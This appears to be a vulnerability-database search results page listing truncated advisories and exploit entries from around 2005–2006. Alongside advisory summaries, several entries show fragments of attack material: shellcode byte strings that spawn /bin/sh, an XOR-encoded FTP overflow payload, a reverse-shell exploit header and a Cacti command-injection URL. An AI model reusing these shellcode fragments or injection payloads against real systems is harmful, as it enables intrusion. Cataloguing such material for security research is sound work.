399 matches found
awstats -- arbitrary command execution vulnerability
OS Reviews reports: If the update of the stats via web front-end is allowed, a remote attacker can execute arbitrary code on the server using a specially crafted request involving the migrate parameter. Input starting with a pipe character "|" leads to an insecure call to Perl's open function and...
Microsoft Windows shell code execution
COM object can execute code. Can be used for hidden malware installation with Internet Explorer...
Ubuntu 4.10 / 5.04 / 5.10 : openssh vulnerability (USN-255-1)
Tomas Mraz discovered a shell code injection flaw in scp. When doing local-to-local or remote-to-remote copying, scp expanded shell escape characters. By tricking a user into using scp on a specially crafted file name (which could also be caught by using an innocuous wild card like '*'), an attacke...
USN-255-1: openssh vulnerability
Tomas Mraz discovered a shell code injection flaw in scp. When doing local-to-local or remote-to-remote copying, scp expanded shell escape characters. By tricking a user into using scp on a specially crafted file name (which could also be caught by using an innocuous wild card like '*'), an attacke...
Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005)
Exploit for unknown platform in category dos / poc =============================================================== Windows Media Player 7.1 include define BITMAPFILESIZE 0xA8D2 define BITMAPFILENAME "crafted.bmp" pragma pack push pragma pack 1 // bitmap file format - http:/...
Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)
No description provided by source. // Two includes. include fstream.h include winsock2.h // Project - Settings - Link Object/Library modules 'Ws232.lib' pragma commentlib, "ws232" char MyShellCode = // XOR by \x99\x99\x99\x99. "\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"...
sco/x86 execve("/bin/sh", ..., NULL); 43 bytes
Exploit for sco/x86 platform in category shellcode ============================================== sco/x86 execve"/bin/sh", ..., NULL; 43 bytes ============================================== / minervini at neuralnoise dot com c 2005 SCOSV scosysv 3.2 5.0.7 i386, execve"/bin/sh", ..., NULL; / inclu...
Microsoft Internet Explorer vulnerable to code execution via mismatched DOM objects
Overview Microsoft Internet Explorer fails to properly handle requests to mismatched DOM objects, which may allow a remote attacker to execute arbitrary code on a vulnerable system. Description Microsoft Internet Explorer does not properly handle requests to mismatched DOM objects, such as the...
linux/x86 dup2(0,0); dup2(0,1); dup2(0,2); 15 bytes
Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 dup20,0; dup20,1; dup20,2; 15 bytes =================================================== / dup2loop-core.c by Charles Stevenson I made this as a chunk you can paste in to make modular...
Webnews.exe Buffer Overflow Vulnerability
The remote host appears to be running WebNews, which offers web-based access to Usenet news. This CGI script suffers from a buffer overflow vulnerability. SPDX-FileCopyrightText: 2003 John Lampe Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the...
Firefox < 1.0.7 Multiple Vulnerabilities
The remote host is using Firefox, an alternative web browser. The installed version of Firefox contains various security issues, several of which are critical as they can be easily exploited to execute arbitrary shell code on the remote host. C Tenable Network Security, Inc. include"compat.inc"; ...
Cisco IOS OSPF neighbor IO buffer overflow
Overview Cisco Internetwork Operating System (IOS) is the operating system for the majority of Cisco routers. Open Shortest-Path First (OSPF) is an interior routing protocol. A flaw in some Cisco IOS versions can allow a buffer overflow when handling a large number of OSPF neighbor connection requests...
Cacti <= 0.8.6d Remote Command Execution Exploit
Exploit for unknown platform in category web applications ================================================ Cacti http://www.example.com/cacti/graphimage.php?localgraphid=validvalue&graphstart=%0acommand%0a Patch: download the last version http://www.cacti.net/downloadcacti.php Discovered and Code...
Cacti 0.8.6d - Remote Command Execution
Cacti 0.8.6d - Remote Command Execution Note: This exploit contains backdoor shell code that is not located on this server. /str0ke !/usr/bin/perl Remote Command Execution Exploit for Cacti http://www.example.com/cacti/graphimage.php?localgraphid=validvalue&graphstart=%0acommand%0a Patch: downloa...
Cacti <= 0.8.6d Remote Command Execution Exploit
No description provided by source. Note: This exploit contains backdoor shell code that is not located on this server. /str0ke !/usr/bin/perl Remote Command Execution Exploit for Cacti <= 0.8.6d This exploit opens a remote shell on the targets that use Cacti TARGET HOST MUST BE A GNU/LINUX SERVER,...
msjet40.txt
See-security Technologies ltd. http://www.see-security.com Microsoft Jet msjet40.dll Reverse Shell Exploit coded by Tal zeltzer Based on the exploit written by S.Pearson import sys import struct Addresses are compatible with Windows XP Service Pack 1 ReturnAddress = 0x77F51B93 Address of "jmp edx...
Newspost 2.1 socket_getline() Remote Buffer Overflow Exploit v2
No description provided by source. / v0.2 Newspost "socketgetline" Buffer Overflow Exploit Exploit Bug discovered: 02/03/2005 cybertronicatgmxdotnet cybertronic @ newspost $ gcc -o newspostexpl newspostexpl.c cybertronic @ newspost $ ./newspostexpl cyber tronic Usage ----- Bindshell ./newspostexp...
bsdi/x86 - execve /bin/sh 46 bytes
bsdi/x86 execve /bin/sh 46 bytes. Shellcode exploit for bsdix86 platform / BSDi execve of /bin/sh by v9 [email protected] / static char exec= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" / 14 characters. / "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" / 14 characters. /...
linux/x86 unix/SPARC execve /bin/sh 80 bytes
linux/x86 unix/SPARC execve /bin/sh 80 bytes. Shellcode exploits for multiple platform / Linux/x86 and Unix/Sparc execve of /bin/sh by dymitri!!! / include char wcode= "\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"...
linux/x86 execve /bin/sh 30 bytes
Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 30 bytes ================================= / email protected 20 de marzo de 2001 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17%ebx,%eax "\xcd\x80" // int $0x80 "\x31\xd2" //...